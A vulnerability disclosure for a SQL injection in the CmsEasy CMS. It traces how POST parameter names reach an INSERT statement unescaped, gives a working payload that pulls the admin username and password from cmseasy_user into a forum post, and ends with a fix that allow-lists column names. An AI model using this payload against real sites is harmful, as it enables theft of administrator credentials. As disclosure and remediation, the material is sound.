CmsEasy latest version SQL injection (ignoring the 360 webscan filter on outgoing data)
This really is not targeted. Vendor, please don't mind. Please check the other two as well. Thank you!
Ignoring 360 webscan.
Version: 20140605
This vulnerability is a repackaging of the WooYun report on CmsEasy's latest V5.5-UTF8 official edition.
The injectable function is in /bbs/add-archive.php:
if (isset($_POST['submit'])) {
    if (strtolower(trim($_POST['verify'])) != strtolower($_SESSION['verify'])) {
        // action_public::turnPage('index.php', 'verification code input error!');
    }
    $archive = db_bbs_archive::getInstance();
    unset($_POST['submit']);
    unset($_POST['verify']);
    $_POST['username'] = $_COOKIE['login_username'];
    $_POST['userid']   = $admin->userid;
    $_POST['ip']       = $_SERVER['REMOTE_ADDR'];
    $_POST['addtime']  = mktime();
    if ($id = $archive->inserData($_POST)) {
        action_public::turnPage('archive-display.php?aid=' . $id, 'Post added successfully');
    } else {
        action_public::turnPage('index.php', 'Failed to add. Please contact us!');
    }
}
Follow the line $archive->inserData($_POST): the whole $_POST array is handed to the inserData function. Let's take a look:
public function inserData($data) {
    $r = $this->odb->insert($this->tblName, $data);
    if ($r) return $this->odb->getInsertId();
    else return false;
}
Follow-up:
public function insert($table, $data) {
    $sql = $this->getInsertString($table, $data);
    return $this->execSql($sql);
}
Follow-up:
public function getInsertString($table, $data) {
    $n_str = '';
    $v_str = '';
    $table = $this->filterString($table);
    foreach ($data as $k => $v) {
        $n_str .= $this->filterString($k) . ',';
        $v_str .= "'" . $this->filterString($v) . "',";
    }
    $n_str = preg_replace("/,$/", "", $n_str);
    $v_str = preg_replace("/,$/", "", $v_str);
    $str = 'INSERT INTO ' . $table . ' (' . $n_str . ') VALUES(' . $v_str . ')';
    return $str;
}
This function simply builds the INSERT statement. filterString is called on the data, but it only escapes single quotes; the keys (column names) are concatenated into the SQL without quoting, so a key that contains no single quote is effectively not filtered at all.
So put the injection statement in the KEY position of a POST parameter, and the statement gets injected.
For more information, see vulnerability proof.
Go to /bbs, create a post, and capture the packet.
Add a POST parameter whose name is the following:
username)/**/values((select/**/concat(username,0x23,password)/**/from/**/cmseasy_user/**/limit/**/0,1),2,3,4,5,6)#
Give it any random value, as follows:
Send it. The database then shows a post whose title contains the injected administrator password:
Its aid is 8, so we only need to access http://localhost/easy/bbs/archive-display.php?aid=8 and the result is displayed:
If we don't know the aid, just enumerate it.
Solution:
The values must be filtered, and the keys (column names) must be filtered as well.
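As an added illustration of that fix (this is example code, not CmsEasy's own), the INSERT builder below treats keys as untrusted too: each column name must match a strict identifier pattern and appear in a per-table allow-list, and is then back-quoted. The table name cmseasy_bbs_archive, the allow-list entries title and content, and the use of addslashes as a stand-in for the project's filterString are assumptions.

```php
<?php
// Added example, not CmsEasy code: an INSERT builder that validates column
// names (the keys of $data) instead of concatenating them into the SQL.
function buildInsert(string $table, array $data, array $allowedColumns): string
{
    // Plain identifiers only. This alone rejects the report's payload, since
    // ')', '/', '(' and ',' are not allowed in a column name.
    $ident = '/^[A-Za-z0-9_]+$/';
    if (!preg_match($ident, $table)) {
        throw new InvalidArgumentException("bad table name: $table");
    }
    $names  = [];
    $values = [];
    foreach ($data as $k => $v) {
        // Reject anything that is not an identifier, and anything outside the
        // allow-list, so a client cannot write to arbitrary columns either.
        if (!preg_match($ident, (string) $k) || !in_array($k, $allowedColumns, true)) {
            throw new InvalidArgumentException("unexpected column name: $k");
        }
        $names[] = '`' . $k . '`';
        // Stand-in for the project's filterString. Real code should use the
        // driver's escape function or, better, prepared statements.
        $values[] = "'" . addslashes((string) $v) . "'";
    }
    return 'INSERT INTO `' . $table . '` (' . implode(',', $names)
         . ') VALUES(' . implode(',', $values) . ')';
}

// Constructed sample: the columns add-archive.php fills in, plus assumed form fields.
$allowed = ['title', 'content', 'username', 'userid', 'ip', 'addtime'];
echo buildInsert('cmseasy_bbs_archive',
                 ['title' => "It's a test", 'content' => 'hello'], $allowed), "\n";

// A key shaped like the report's payload is refused before any SQL is built.
try {
    buildInsert('cmseasy_bbs_archive', ['username)/**/values((select 1),2)#' => 'x'], $allowed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```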